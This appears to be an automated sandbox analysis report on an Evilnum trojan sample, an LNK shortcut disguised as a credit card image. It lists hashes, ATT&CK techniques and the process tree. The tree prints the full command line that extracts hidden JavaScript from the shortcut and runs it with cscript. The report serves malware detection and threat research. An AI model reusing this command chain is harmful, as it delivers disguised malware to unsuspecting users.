evilnum | ca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30

Analysis

Target

ca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30.lnk
Size

61KB
MD5

41a80cc28047b7aeafe846aaa23c2cfe
SHA1

513b161299d99f4be1dffbb171b7c4040ff83de7
SHA256

ca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30
SHA512

5f2be20007d35a9fd48bb7ef8229f51d119f2c002e25d2ecb99813a8eb585b752917ef136e219c08fddd5e685671af36052f48a863f5f9dac189ea9e6947c437

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2040 wrote to memory of 1368	2040	cmd.exe	69
PID 2040 wrote to memory of 1368	2040	cmd.exe	69
PID 1368 wrote to memory of 1144	1368	cmd.exe	70
PID 1368 wrote to memory of 1144	1368	cmd.exe	70
PID 1368 wrote to memory of 1476	1368	cmd.exe	71
PID 1368 wrote to memory of 1476	1368	cmd.exe	71
PID 1368 wrote to memory of 1340	1368	cmd.exe	72
PID 1368 wrote to memory of 1340	1368	cmd.exe	72
PID 1368 wrote to memory of 1596	1368	cmd.exe	73
PID 1368 wrote to memory of 1596	1368	cmd.exe	73
PID 1368 wrote to memory of 2368	1368	cmd.exe	74
PID 1368 wrote to memory of 2368	1368	cmd.exe	74

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Credit Card Back.jpg.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1476
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:1340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1596
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:2368

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact